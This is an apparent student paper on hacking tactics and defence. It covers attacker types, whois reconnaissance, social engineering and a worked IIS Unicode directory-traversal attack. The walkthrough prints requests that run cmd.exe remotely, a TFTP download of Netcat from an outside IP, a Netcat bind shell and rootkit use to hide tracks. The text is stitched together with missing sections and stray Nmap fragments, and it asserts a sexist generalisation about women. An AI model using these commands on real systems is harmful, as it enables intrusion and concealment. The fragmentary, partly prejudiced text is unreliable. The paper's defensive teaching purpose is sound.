Beruflich Dokumente
Kultur Dokumente
Abstract
Companies lose millions of dollars due to bad security practices. More and more users are using the Internet every day and a very small percentage of them know how to defend themselves. It is important to understand how hackers get into systems in order to beat them at their own game. By knowing the tools and tricks of the trade that hackers use, one is better able to defend against an attack. This paper will also talk about a standard attack plan that most attackers follow, defensive programs, how to maximize security, and also how the law punishes convicted offenders of hacking.
Introduction
A hacker is a Database Administrators (DBA) worst nightmare. A company could go bankrupt or loose millions of dollars due to bad security practices. Whether theyre multiple attackers or just a single attacker, the company is totally dependent on the DBA. Some Database Administrators would prefer going into a heavy military war zone then having to defend against an attack [1]. A patient hacker has an unlimited amount of time and resources to try and crack the case.
Types of Attackers
There are three types of attackers, in the form of a pyramid [2]. On the bottom portion of the pyramid exists what is known as Script Kiddies. They have limited knowledge of computer technology and programming. A Script Kiddy simply acquires scripts found on the Internet and deploys their use. In general, they fire off random scripts until something works. They do tend to get caught more frequently due to their lack of knowledge; however, they still pose a dramatic threat to organizations. In the middle of the pyramid exists an IT savvy person. These people understand how to use programming and scripting languages. They also understand vulnerabilities, but in most cases the subject cannot find new vulnerabilities. They are also intelligent enough to use the exploit code and tools with precision. At the top of the pyramid is the cream of the crop. These people have the IQs to boil water. They have the ability to find new vulnerabilities and to write exploit code and tools. Thankfully, the people at the top of the pyramid are limited in numbers. However, they cause the most
problems, not only because of their intelligence level, but also in their general willingness to give out the tools they have made to the public.
This stealth scan will provide the attacker with the rest of the IP addresses of the network, all of the open ports on each terminal, and other things, depending on the scanner.
Whois Databases
In just about every case, an attacker will consult these databases to the basic research they need to get started. Whois queries provide a hacker with the majority of information that hackers need to begin their attacks [2]. There are four main types of queries: registrar, domain, network, and point of contact [2]. A great place to find registrar information is from http://www.internic.net/whois.html. A target often has several registrars. Internic.net has a rather large listing of associated registrar information. An attacker must determine the correct registrar so that he or she can submit detailed queries to the correct database in subsequent steps [2]. Once the correct registrar is found, a domain query is then the next best approach. A domain query will often provide the name of the registrant, the domain name, the administrative contact, when the record was created and updated, and the primary and secondary DNS servers [2]. This query can also be used at the same site used for registrar information.
A network query maintains specific network blocks that an organization owns. The American Registry for Internet Numbers (ARIN) is a popular database that can be used to determine networks associated with a target domain [2]. The web page for this database is http://www.arin.net. The ARIN database can also be used for point of contact (POC) queries. If an email address is provided in the domain query, it can be used to find more information by searching the ARIN database using the email address directly. Sometimes after doing this, an attacker will find more domains that the attacker did not know about [2]
Social Engineering
An attacker often requires help from the inside of organizations. An attackers main goal in using social engineering is to act as if he belongs. By gaining trusted individuals, he or she may not even have to do any hacking. An old epidemic that happened several years ago was the I LOVE YOU virus that attached to emails and then massively sent it out using a targets address book. The reason this virus had such an impact was due to the subject title. A lot of people that were not IT savvy couldnt help resist to find out who loved them so much [1]. This example was not involved with hacking, however, hackers can use the same ploys to trick people into doing what they want. If an attacker were extremely dedicated to cracking the case of some company, perhaps he or she would go to the headquarters. A perfect demonstration of an attacker arriving at a headquarters is in the following example [3]: After arriving at the target location, the social engineer strikes up small talk with another employee as they walk toward the building. When they arrive at the locked door, the social engineer will pat down his coat pockets, looking for his key or pass card. In such a case, most anyone will do the other guy a favor and let him in with their key. Far from playing the part of the nervous interloper, the social engineer will enter the premises with calm confidence; pretending he truly belongs where he is. All the while, he will move about in a totally unassuming manor, obliquely acknowledging others going about his job. All the while, he will make a point of not attracting attention to himself, unobtrusively scooping the surroundings for tidbits of information that will aid him in his goal. The main systems are typically easy to locate as they are invariably showcased behind large glass walls. The OS of the systems running inside the network will be painfully obvious by the unattended monitors, which display the user interface and even the OS version number. The presence of Sun MicroSystems Sparc hardware in the computer room narrows the OS possibly down to Solaris or RedHat Linux. The toy penguins in the lead developers office are sufficient clue that Linux is widely used. A stroll through the cubicles leads to the discovery of a number of Post-It notes near (or even on) a monitor that reveal a users current login and password combination. The example above may be a bit more extreme, however, everything it stated is quite possible with social engineering skills.
Another issue in social engineering is women. A lot of men dont think of women as IT savvy and will give out more information to them because the men dont think the women can do any damage with it [3].
Nmap run completed 256 IP addresses [1 host up| scanned in 360 seconds] From the results from Nmap, there are a lot of possible vulnerabilities from all the different services listed. One of the easiest to try things out on is telnet, which will be used in the steps below. If there are vulnerabilities in the services listed from Nmap, chances are pretty good that a hacker can get access. This Nmap result is actually quite small as well since it scanned 256 IP addresses. However, even one terminal with multiple open ports can lead to serious issues.
Escape character is ^]. GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+> +test.msg HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Fri, 16 Feb 2001 19:20:32 GMT Content-Length: 0 Content-Type: text/plain Connection closed by foreign host. This attempt appears to be successful, but to make sure it successfully worked, we need to try and read the file we attempted to write on the server [3]. If successful, we will be able to read and write on the given server. This will allow us to do just about anything we want to compromise the system. To test the results, use the following GET command after issuing another Telnet connection [3]: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg If the result shows test message, which is the title of the file created earlier, it was successful. This pretty much allows the attacker to do anything he or she wants [3]. To issue the full scale attack, the attacker needs a few tools to get the job done. A rootkit is needed to hide the attackers tracks [3]. Rootkits can be downloaded and used from many different sites on the Internet. The correct rootkit must be downloaded based on the operating system, or whatever attack is being done. Another necessary item is a way to bind a specified port on the target system in order to log in directly [3]. The program used in this example is Netcat. With these two tools, the attack can be issued.
The Attack
The attacker needs a way to download the rootkit and Netcat into the target system. Since Windows NT does not support passive FTP, the attacker must use TFTP (Trivial File Transfer Protocol). In order to use TFTP, the attacker issues the following GET [3]: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+i+216.240.45.60+GET+nc.exe The attacker then must download Netcat and the rootkit using TFTP. This can be done by using a two separate GETs for the files by replacing nc.exe with the file names of the rootkit and Netcat [3]. After the items are downloaded onto the server, the attacker must issue a Netcat command to bind a port for the attackers use. Here is an example of using the GET command to bind a port using Netcat [3]: GET /scripts/.%c1%9c../winnt/system32/cmd.exe?/c+nc.exe-1+-p+100+-t+e+cmd.exe The port cannot be an open port already in use by the system, so for this example, port 100 is used. After this step, the attacker issues one final command to get system access [3]: $ telnet 208.37.215.233 100 Trying 208.37.215.233. Connected to 208.37.215.233. Escape character is ^]. C:\winnt\system32\>
This whole process may seem a bit complicated, but these vulnerabilities are clearly listed on the Internet. They sometimes show a step-by-step process just like I have gone through. After the attacker has system access, he or she would put in the rootkit to hide everything that has just happened from the System Administrator.
A System Administrator could also set up an easy entry point for which he wants to draw hackers into. A trap like this, if properly set up, will get flagged immediately and hopefully some information about the hacker is left behind.
Conclusion
There are many types of hackers out there, all of whom are dangerous. To successfully penetrate a system, an attacker needs tools and information. There is nothing you can do to stop hacking tools from being spread around, but you can protect yourself from an invasion by hiding information. Anything is penetrable, no matter how secure. However, the more secure a network is, the harder it is to crack. Not all hacking is done over the Internet. Be weary of disgruntled employees and social engineering ploys. Disgruntled employees do the majority of all attacks. The best way to protect a network from invasion is by getting the latest patches from vendors. This in itself will cancel out hundreds of known vulnerabilities and make a system, or network, much safer.
References
[1] Ahmad, David R. Mirza.; Russel, Ryan. Hack Proofing Your Network. Rockland: Syngress Publishing, Inc. 2002. [2] McClure, Stuart; Scambray, Joel; Kurtz, George. Hacking Explosed: Network Security Secrets & Solutions. Fourth Edition. Berkeley: Nordin. 2003. [3] Hack Proofing Your Web Applications: The Only Way to Stop a Hacker is to Think Like One. Rockland: Syngress Publishing, Inc., 2001. [4] Chirillo, John. Hack Attacks Testing: How to Conduct Your Own Security Audit. Indianapolis: John Wiely & Sons, Inc. 2003.